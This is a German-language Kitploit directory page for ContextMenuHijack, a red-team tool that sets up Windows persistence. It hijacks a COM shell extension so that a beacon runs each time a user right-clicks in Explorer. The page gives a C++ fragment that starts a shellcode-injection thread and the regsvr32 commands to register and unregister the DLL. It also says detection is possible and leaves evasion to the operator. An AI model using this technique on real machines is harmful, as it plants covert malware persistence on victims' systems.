Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ContextMenuHijack — Führe bei jedem Rechtsklick auf eine Datei/einen Ordner im Explorer-Menü ein Payload aus, um Persistenz zu erlangen. | Kitploit
Tools/GitHubGitHub/ristbs/contextmenuhijack
PersistenzmechanismenPost-ExploitationRed TeamingPayload-Entwicklung
GitHubristbs/contextmenuhijack

ContextMenuHijack

Führe bei jedem Rechtsklick auf eine Datei/einen Ordner im Explorer-Menü ein Payload aus, um Persistenz zu erlangen.

Repository anzeigen
17327vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ContextMenuHijack

Diese ursprüngliche Idee, die mich inspiriert hat, stammt von @NinjaParanoid:

Video

ContextMenuHijack ist eine einfache Persistenztechnik, die COM-Hijacking auf der Grundlage menschlichen Verhaltens nutzt: Wenn du im Datei-Explorer mit der rechten Maustaste auf eine Datei/einen Ordner klickst, um das Kontextmenü zu öffnen, wird zur gleichen Zeit der von uns angegebene Beacon ausgeführt.

root@kitploit:~
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
    DWORD tid = NULL;
    CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);

    if (NULL == pDataObj) {
	if (pidlFolder != NULL) {
	}
        return S_OK;
    }
    return S_OK;
}

Verwendung

Du musst nur die Projektmappendatei (.sln) laden und erstellen. Es ist wichtig zu wissen, dass du Administratorrechte benötigst, um diese Persistenztechnik zu nutzen. Wenn du das alles erledigt hast, musst du die DLL-Datei nur noch mit regsvr32 in der Registrierung registrieren:

root@kitploit:~
regsvr32 "C:\path\to\ContextMenuHijack.dll"

Wenn du es deinstallieren möchtest, verwende einfach das Flag /u

root@kitploit:~
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

persistence1

  • Diese Technik kann leicht über den Thread-Stack von explorer.exe erkannt werden. Es liegt an dir, deine eigene Evasion-Tradecraft zu verwenden. image

Danksagungen

  • https://github.com/rikka0w0/ExplorerContextMenuTweaker
  • https://learn.microsoft.com/en-us/windows/win32/shell/how-to-implement-the-icontextmenu-interface?redirectedfrom=MSDN
  • https://www.codeproject.com/Articles/441/The-Complete-Idiot-s-Guide-to-Writing-Shell-Extens
Tool herunterladen